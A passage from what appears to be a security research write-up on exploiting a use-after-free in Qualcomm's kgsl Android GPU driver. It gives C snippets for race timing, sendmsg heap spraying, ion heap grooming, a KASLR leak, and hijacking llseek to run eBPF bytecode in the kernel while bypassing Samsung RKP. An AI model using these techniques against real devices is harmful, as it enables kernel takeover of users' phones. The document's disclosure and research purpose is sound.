- As the SCHED_IDLE task is running, send some data to the pipe that the SCHED_NORMAL task had been waiting on. This will wake up the SCHED_NORMAL task and cause it to preempt the SCHED_IDLE task, and because of the task priority, the SCHED_IDLE task will be preempted and put on hold.
- The SCHED_NORMAL task can then run a busy loop to keep the SCHED_IDLE task from waking up.
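A minimal sketch of this scheduler set up, using only standard Linux APIs (the thread bodies are placeholders for the DMA_BUF_IOCTL_SYNC call and the busy loop used below):

#define _GNU_SOURCE
#include <pthread.h>
#include <sched.h>
#include <unistd.h>

static int pipefd[2];   /* created with pipe(pipefd) before the threads start */

/* Pin the calling thread to `cpu` and give it the scheduling policy `policy`. */
static void pin_and_set_policy(int cpu, int policy)
{
    cpu_set_t set;
    struct sched_param param = { .sched_priority = 0 };

    CPU_ZERO(&set);
    CPU_SET(cpu, &set);
    sched_setaffinity(0, sizeof(set), &set);
    sched_setscheduler(0, policy, &param);
}

/* The SCHED_NORMAL helper: sleeps in read() until data arrives, then spins. */
static void *normal_task(void *arg)
{
    char c;
    pin_and_set_policy(1, SCHED_OTHER);   /* SCHED_OTHER is the userspace name of SCHED_NORMAL */
    read(pipefd[0], &c, 1);               /* blocks, voluntarily giving up the cpu */
    for (;;)
        ;                                 /* busy loop: keeps the SCHED_IDLE task on hold */
    return NULL;
}

/* The SCHED_IDLE victim: runs the operation that we want to interrupt mid-way. */
static void *idle_task(void *arg)
{
    pin_and_set_policy(1, SCHED_IDLE);
    /* ... perform the DMA_BUF_IOCTL_SYNC call here ... */
    return NULL;
}

/* Called from the main task after a tuned delay: waking the SCHED_NORMAL task
 * preempts the SCHED_IDLE task at exactly this moment. */
static void preempt_idle_task(void)
{
    write(pipefd[1], "x", 1);
}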
In our case, the object replacement sequence goes as follows:
- Obtain a free’d sg_table in a DMA buffer using the method in the section Getting a free’d object with a fake out-of-memory error.
- First replace this free’d sg_table with another one that I can free easily, for example, making another call to IOCTL_KGSL_GPUOBJ_IMPORT will give me a handle to a kgsl_mem_entry object, which allocates and owns a sg_table. Making this call immediately after step one will ensure that the newly created sg_table replaces the one that was free’d in step one. To free this new sg_table, I can call IOCTL_KGSL_GPUMEM_FREE_ID with the handle of the kgsl_mem_entry, which will free the kgsl_mem_entry and in turn frees the sg_table. In practice, a little bit more heap manipulation is needed as IOCTL_KGSL_GPUOBJ_IMPORT will allocate another object of similar size before allocating a sg_table.
- Set up a SCHED_NORMAL task on, say, cpu_1 that is listening to an empty pipe.
- Set up a SCHED_IDLE task on the same cpu and have it wait until I signal it to run DMA_BUF_IOCTL_SYNC on the DMA buffer that contains the sg_table in step two.
- The main task signals the SCHED_IDLE task to run DMA_BUF_IOCTL_SYNC.
- The main task waits a suitable amount of time until sgl is cached in a register, then sends data to the pipe that the SCHED_NORMAL task is waiting on.
- Once it receives data, the SCHED_NORMAL task goes into a busy loop to keep the DMA_BUF_IOCTL_SYNC task from continuing.
- The main task then calls IOCTL_KGSL_GPUMEM_FREE_ID to free up the sg_table, which will also free the object pointed to by sgl that is now cached in a register. The main task then replaces this object by controlled data using sendmsg heap spraying (sketched after this list). This gives control of both dma_address and dma_length in sgl, which are used as arguments to memcpy.
- The main task signals the SCHED_NORMAL task on cpu_1 to stop so that the DMA_BUF_IOCTL_SYNC task can resume.
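Step eight relies on the well known sendmsg heap spraying technique: the control message passed to sendmsg is copied into a kernel buffer allocated with kmalloc(msg_controllen), and if the call then blocks (because the receiving socket’s queue is already full), that buffer, whose content we largely control, stays allocated until the call completes. A minimal sketch with illustrative sizes follows; note that the first sizeof(struct cmsghdr) bytes of the sprayed object are the header and cannot be chosen freely:

#include <string.h>
#include <sys/socket.h>

/* Spray one kmalloc allocation whose tail we control. send_fd should be the
 * sending end of a SOCK_DGRAM socketpair whose receiving end is already full,
 * so that sendmsg blocks while holding the kernel copy of the control data. */
static void spray_one(int send_fd, const void *payload, size_t payload_len)
{
    char cbuf[256] = {0};
    char body = 'A';
    struct iovec iov = { .iov_base = &body, .iov_len = 1 };
    struct msghdr msg = {0};
    struct cmsghdr *cmsg = (struct cmsghdr *)cbuf;

    cmsg->cmsg_len = CMSG_LEN(payload_len);
    cmsg->cmsg_level = SOL_SOCKET + 1;   /* not SOL_SOCKET, so the payload is not interpreted */
    cmsg->cmsg_type = 0;
    memcpy(CMSG_DATA(cmsg), payload, payload_len);

    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = cbuf;
    msg.msg_controllen = CMSG_LEN(payload_len);   /* total size selects the kmalloc cache */

    sendmsg(send_fd, &msg, 0);   /* blocks, keeping the controlled data in the kernel heap */
}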
The following figure illustrates what happens in an ideal world.

The following figure illustrates what happens in the real world.

Crazy as it seems, the race can actually be won almost every time, and the same parameters that control the timing even work on both the Galaxy A71 and Pixel 4. Even when the race fails, it does not result in a crash. It can, however, crash if the free’d object ends up being taken over by some other allocation whose content yields an invalid dma_address or dma_length.
The ion heap
Now that I’m able to replace the free’d object and control the arguments of the memcpy, it is time to decide what data to place behind DMA_1 for the out-of-bounds access, and for that I need to understand how the ion heap allocates memory.
To allocate DMA buffers, I need to use the ion allocator, which will allocate from the ion heap. There are different types of ion heaps, but not all of them are suitable, because I need one that allocates buffers with physical addresses greater than 32 bits. The locations of the various ion heaps can be seen in the kernel log during boot; the following is from a Galaxy A71:
[ 0.626370] ION heap system created
[ 0.626497] ION heap qsecom created at 0x000000009e400000 with size 2400000
[ 0.626515] ION heap qsecom_ta created at 0x00000000fac00000 with size 2000000
[ 0.626524] ION heap spss created at 0x00000000f4800000 with size 800000
[ 0.626531] ION heap secure_display created at 0x00000000f5000000 with size 5c00000
[ 0.631648] platform soc:qcom,ion:qcom,ion-heap@14: ion_secure_carveout: creating heap@0xa4000000, size 0xc00000
[ 0.631655] ION heap secure_carveout created
[ 0.631669] ION heap secure_heap created
[ 0.634265] cleancache enabled for rbin cleancache
[ 0.634512] ION heap camera_preview created at 0x00000000c2000000 with size 25800000
As we can see, some ion heaps are created at fixed locations with fixed sizes, and the addresses of these heaps are also smaller than 32 bits. However, there are other ion heaps, such as the system heap, that do not have fixed addresses. These are the heaps that can have addresses higher than 32 bits. For the exploit, I’ll use the system heap.
DMA buffers allocated on the system heap get their pages either from a set of page pools maintained by the heap, or, when the pools run out, directly from the buddy allocator via alloc_pages:
static void *ion_page_pool_alloc_pages(struct ion_page_pool *pool)
{
struct page *page = alloc_pages(pool->gfp_mask, pool->order);
...
return page;
}
and the pages are recycled back to the pool after the buffer is freed.
This latter case is more interesting, because if the memory is allocated from the existing pool, then any out-of-bounds read/write is likely to just be reading and writing other ion buffers, which is only going to be user space data. So let’s take a look at how the memory handed out by alloc_pages is organized.
The function alloc_pages uses the buddy allocator, which hands out blocks of 2^order contiguous pages. The slabs backing the kmalloc caches are also blocks of pages from the buddy allocator, whose sizes can be read from /proc/slabinfo:
kmalloc-8192 1036 1036 8192 4 8 : tunables 0 0 0 : slabdata 262 262 0
...
kmalloc-128 378675 384000 128 32 1 : tunables 0 0 0 : slabdata 12000 12000 0
In the above, the last number before the colon is the number of pages per slab: a slab in kmalloc-8192 consists of 8 pages (an order 3 block), while a slab in kmalloc-128 consists of a single page (an order 0 block).
Manipulating the buddy allocator heap
As mentioned in Exploiting the Linux kernel via packet sockets, for each order, the buddy allocator maintains a freelist and uses it to serve allocations of that order. When a certain order runs out of free blocks, a block from the next non empty higher order is split in half: one half is used for the allocation, while the other is added to the freelist of the order below.
In fact, after some experimentation on Pixel 4, it seems that after allocating a certain amount of DMA buffers from the ion system heap, the allocations follow a very predictable pattern.
- The addresses of the allocated buffers are grouped in blocks of 4MB, which corresponds to order 10, the highest order block on Android.
- Within each block, a new allocation will be adjacent to the previous one, with a higher address.
- When a 4MB block is filled, allocations will start in the beginning of the next block, which is right below the current 4MB block.
The following figure illustrates this pattern.

So by simply creating a large amount of DMA buffers in the ion system heap, the likelihood is that the last allocated buffer will sit in front of a "hole" of free memory, and the next allocation from the buddy allocator is likely to land inside this hole, provided the requested number of pages fits in it.
The heap spraying strategy is then very simple. First allocate a sufficient amount of DMA buffers in the ion heap to cause the larger blocks to break up, then allocate a large amount of kernel objects that I want to read or overwrite (for example by opening the binder device, as described in the next section), so that they land in the hole behind the last DMA buffer.
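As an illustration of this strategy, a grooming routine could look roughly like the following. The ion UAPI definitions and the system heap id are written out here as assumptions (check them against linux/ion.h and linux/msm_ion.h of the target kernel), and the buffer counts and sizes are placeholders; the working values are in the full exploit:

#include <fcntl.h>
#include <sys/ioctl.h>
#include <linux/types.h>

/* Minimal ion UAPI, as in the post-4.12 ion ABI used by 4.14 msm kernels (assumption). */
struct ion_allocation_data {
    __u64 len;
    __u32 heap_id_mask;
    __u32 flags;
    __u32 fd;
    __u32 unused;
};
#define ION_IOC_ALLOC _IOWR('I', 0, struct ion_allocation_data)
#define MSM_ION_SYSTEM_HEAP_ID 25   /* assumed id of the ion system heap on msm kernels */

#define NUM_DMA_BUFS   64    /* placeholder */
#define NUM_BINDER_FDS 512   /* placeholder */

static int dma_fds[NUM_DMA_BUFS];
static int binder_fds[NUM_BINDER_FDS];

static void groom_heap(void)
{
    int ion_fd = open("/dev/ion", O_RDONLY);

    /* 1. Break up the higher order blocks by allocating DMA buffers from the ion
     *    system heap; the last one is likely to sit right in front of a hole. */
    for (int i = 0; i < NUM_DMA_BUFS; i++) {
        struct ion_allocation_data alloc = {
            .len = 4 * 4096,   /* placeholder size */
            .heap_id_mask = 1u << MSM_ION_SYSTEM_HEAP_ID,
        };
        ioctl(ion_fd, ION_IOC_ALLOC, &alloc);
        dma_fds[i] = alloc.fd;
    }

    /* 2. Fill the hole behind the last buffer with objects that are worth leaking,
     *    for example the file and binder_proc structs created by opening binder. */
    for (int i = 0; i < NUM_BINDER_FDS; i++)
        binder_fds[i] = open("/dev/binder", O_RDWR);
}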
Defeating KASLR and leaking the address of a DMA buffer
Initially, I was experimenting with the objects created by opening the binder device, /dev/binder. Each open allocates a binder_proc in binder_open:
static int binder_open(struct inode *nodp, struct file *filp)
{
...
proc = kzalloc(sizeof(*proc), GFP_KERNEL);
if (proc == NULL)
which is of size 560 and will persist until the /dev/binder file is closed. After spraying a large number of these opens behind DMA_1 and dumping the memory there with the out-of-bounds read primitive, I noticed a recurring pattern like the following:
00011020: 68b2 8e68 c1ff ffff 08af 5109 80ff ffff h..h......Q.....
00011030: 0000 0000 0000 0000 0100 0000 0000 0000 ................
00011040: 0000 0200 1d00 0000 0000 0000 0000 0000 ................
...
The second quadword here, 0xffffff800951af08, looks like a pointer into the kernel image, and on a rooted device it can be identified via /proc/kallsyms:
# echo 0 > /proc/sys/kernel/kptr_restrict
# cat /proc/kallsyms | grep ffffff800951af08
ffffff800951af08 r binder_fops
So it looks like these are the file structs of the binder instances that I opened, with their f_ops field pointing to the binder_fops constant in the kernel image.
Moreover, the file struct contains a mutex (the f_pos_lock field):
struct mutex {
atomic_long_t owner;
spinlock_t wait_lock;
...
struct list_head wait_list;
...
};
which is a standard doubly linked list in linux:
struct list_head {
struct list_head *next, *prev;
};
When the wait_list is empty, both its next and prev pointers point back to the wait_list itself, that is, to an address inside the file struct, which reveals where the file struct lives in memory.
By using the address of the file struct, together with its offset within the dumped memory, I can also work out the address of the DMA buffer I dumped from. So the plan is as follows:
- Use the out-of-bounds read primitive gained from the use-after-free to dump memory behind a DMA buffer that I controlled.
- Search for binder file structs within the memory using the predictable pattern and get the offset of the file struct.
- Use the identified file struct to obtain the address of binder_fops and the address of the file struct itself from the wait_list field.
- Use the binder_fops address to work out the KASLR slide and use the address of the file struct, together with the offset identified in step two, to work out the address of the DMA buffer.
- Use the out-of-bounds write primitive gained from the use-after-free to overwrite the f_ops pointer of the file that corresponds to this file struct (which I owned), so that it now points to a fake file_operation struct stored in my DMA buffer. Using file operations on this file will then execute functions of my choice.
Since there is nothing special about the binder device here, other than being a convenient way of spraying file structs with an easily recognizable f_ops pointer, files of other types could be used in the same way.
Getting arbitrary kernel code execution
To complete the exploit, I’ll use "the ultimate ROP gadget" that was used in An iOS hacker tries Android by Brandon Azad (and I in fact stole a large chunk of code from his exploit). As explained in that post, the function __bpf_prog_run32 can be used to run eBPF bytecode in the kernel:
unsigned int __bpf_prog_run32(const void *ctx, const bpf_insn *insn)
To invoke eBPF bytecode, I need to set the second argument to point to the location of the bytecode. As I already know the address of a DMA buffer that I control, I can simply store the bytecode in the buffer and use its address as the second argument to this call. This would allow us to perform arbitrary memory load/store and call arbitrary kernel functions with up to five arguments and a 64 bit return value.
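For illustration, here is the sort of payload that can be placed in the buffer, using the eBPF instruction encoding from linux/bpf.h. The program below simply returns a constant; the real payload uses memory load/store and call instructions to read and write kernel memory and to call kernel functions, as described above:

#include <string.h>
#include <linux/bpf.h>

/* mov r0, 0x1337; exit -- __bpf_prog_run32 returns the value left in r0, which
 * then becomes the return value of the hijacked file operation. */
static const struct bpf_insn payload[] = {
    { .code = BPF_ALU64 | BPF_MOV | BPF_K, .dst_reg = 0, .src_reg = 0, .off = 0, .imm = 0x1337 },
    { .code = BPF_JMP | BPF_EXIT, .dst_reg = 0, .src_reg = 0, .off = 0, .imm = 0 },
};

/* Copy the bytecode into the mmap'ed cpu view of the DMA buffer whose kernel
 * address was leaked earlier (dma_buf_cpu_view is a hypothetical name). */
static void place_payload(void *dma_buf_cpu_view)
{
    memcpy(dma_buf_cpu_view, payload, sizeof(payload));
}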
There is, however, one more detail that needs taking care of. Samsung devices implement an extra protection mechanism called the Realtime Kernel Protection (RKP), which is part of Samsung KNOX. Research on the topic is widely available, for example, Lifting the (Hyper) Visor: Bypassing Samsung’s Real-Time Kernel Protection by Gal Beniamini and Defeating Samsung KNOX with zero privilege by Di Shen.
For the purpose of our exploit, the more recent A Samsung RKP Compendium by Alexandre Adamski and KNOX Kernel Mitigation Bypasses by Dong-Hoon You are relevant. In particular, A Samsung RKP Compendium offers a thorough and comprehensive description of various aspects of RKP.
Without going into much detail about RKP, the two parts that are relevant to our situation are:
- RKP implements a form of CFI (control flow integrity) check to make sure that all function calls can only jump to the beginning of another function (JOPP, jump-oriented programming prevention).
- RKP protects important data structure such as the credentials of a process so they are effectively read only.
Point one means that even though I can hijack the f_ops pointer of a file, I can only divert it to the start of another kernel function, not to an arbitrary gadget in the middle of one. Point two means that I cannot simply overwrite the credentials of my own process to become root, even with arbitrary kernel memory read and write.
In our situation, point one is actually not a big obstacle. The fact that I am able to hijack the f_ops pointer and point it to a fake file_operation struct under my control means that I can call a kernel function of my choice with arguments that I partially control, and __bpf_prog_run32 is exactly the kind of function entry that turns this into arbitrary code execution while still respecting JOPP. A convenient entry to replace is llseek:
struct file_operations {
struct module *owner;
loff_t (*llseek) (struct file *, loff_t, int);
...
This function takes a 64 bit integer, loff_t, as its second argument, which can be supplied directly from user space via the lseek64 syscall:
off_t lseek64(int fd, off_t offset, int whence);
where offset is a 64 bit value controlled by the caller and is passed through as the second argument of llseek. So by replacing the llseek entry of the fake file_operation struct with __bpf_prog_run32 and calling lseek64 on the corrupted file with offset set to the address of the eBPF bytecode stored in my DMA buffer, I get to run arbitrary eBPF bytecode in the kernel.
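Putting these pieces together, triggering the payload is then a single syscall on the hijacked file. In the sketch below, ebpf_payload_kaddr stands for the kernel address of the bytecode inside the DMA buffer, computed from the leak in the previous section (the names are mine):

#define _GNU_SOURCE
#include <stdint.h>
#include <unistd.h>

/* binder_fd: the file whose f_ops now points to the fake file_operation struct
 * in which llseek has been replaced by __bpf_prog_run32. */
static long run_kernel_payload(int binder_fd, uint64_t ebpf_payload_kaddr)
{
    /* The offset argument travels unchanged into the second argument of llseek,
     * i.e. into the insn argument of __bpf_prog_run32. */
    return lseek64(binder_fd, (off64_t)ebpf_payload_kaddr, SEEK_SET);
}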
As explained before, because of RKP, it is not possible to simply overwrite process credentials to become root even with arbitrary kernel code execution. However, as pointed out in Mitigations are attack surface, too by Jann Horn, once we have arbitrary kernel memory read and write, all the userspace data and processes are essentially under control, and there are many ways to take over privileged user processes, such as those running with system privileges, and effectively gain those privileges. Apart from the concrete technique mentioned in that post for accessing sensitive data, another concrete technique, mentioned in Galaxy’s Meltdown — Exploiting SVE-2020-18610, is to overwrite the kernel stack of a privileged process to gain arbitrary kernel code execution as that process. In short, there are many post exploitation techniques available at this stage to effectively root the phone.
Conclusion
In this post I looked at a use-after-free bug in the Qualcomm kgsl driver. The bug was a result of a mismatch between the user supplied memory type and the actual type of the memory object created by the kernel, which led to incorrect clean up logic being applied when an error happens. In this case, two common software errors, the ambiguity in the role of a type, and incorrect handling of errors, played together to cause a serious security issue that can be exploited to gain arbitrary kernel code execution from a third-party app.
While great progress has been made in sandboxing the userspace services in Android, the kernel, and in particular vendor drivers, remains a dangerous attack surface. A successful exploit of a memory corruption issue in a kernel driver can escalate to gain the full power of the kernel, which often results in a much shorter exploit chain.
The full exploit can be found here with some set up notes.
Next week I’ll be going through the exploit of Chrome issue 1125614 (GHSL-2020-165) to escape the Chrome sandbox from a beta version of Chrome.